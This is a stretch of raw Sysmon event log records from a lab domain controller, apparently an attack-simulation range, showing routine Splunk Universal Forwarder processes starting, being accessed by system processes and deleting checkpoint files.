Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13EDB836936A9C521740C718700CB598,SHA256=78B22EC45FF53311978A40BD4978D58DE89F7CF52260B56AE31C4847EE27B988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204603Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:01.746{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92FC3C9295DBEBC62B2D45651E1675EC,SHA256=CB62CD63B81C9E6625D53BB93E623A2167B5E6D749F58EDC8A93A2D9509C96E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204621Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.855{5ABCFE62-EA76-6040-6C4E-00000000AD01}50243844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002204620Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.761{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF8FBB40BC9CB6FDABCD8CE92EDDE299,SHA256=9A6AD604EC855E3FD7DC0975B206B08EA16A1B48E030748420A6A31939265AD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204619Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA76-6040-6C4E-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204618Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204617Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204616Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204615Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204614Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-EA76-6040-6C4E-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204613Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.730{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA76-6040-6C4E-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204612Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.731{5ABCFE62-EA76-6040-6C4E-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002204611Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA76-6040-6B4E-00000000AD01}7012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204610Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204609Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204608Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204607Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204606Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-EA76-6040-6B4E-00000000AD01}7012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204605Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.058{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA76-6040-6B4E-00000000AD01}7012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204604Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:02.059{5ABCFE62-EA76-6040-6B4E-00000000AD01}7012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204632Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.793{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9336B98A9F1BA748AD0D2759A80697A,SHA256=8418255F3E6B229A3E14AFD04EBF9A53C9BC15C10A3392791E4E65AEF7A9998C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204631Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA77-6040-6D4E-00000000AD01}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204630Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204629Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204628Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204627Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204626Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-EA77-6040-6D4E-00000000AD01}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204625Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.402{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA77-6040-6D4E-00000000AD01}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204624Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.403{5ABCFE62-EA77-6040-6D4E-00000000AD01}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204623Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.090{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A264E2BBDE9D78309541B4348E7527A,SHA256=DC86CD4BFC8D0E7A5820D5F4C69CE8AF46D72A07E982655D11BC6325C5673CD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204622Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:03.090{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2ACD492DB270C91E7AE9104FED084F9,SHA256=4C1F0456BBA62BC7CF0CC8F55931BAA781CDE624BC68F7437D0FAB7D019B5661,IMPHASH=00000000000000000000000000000000falsetrue 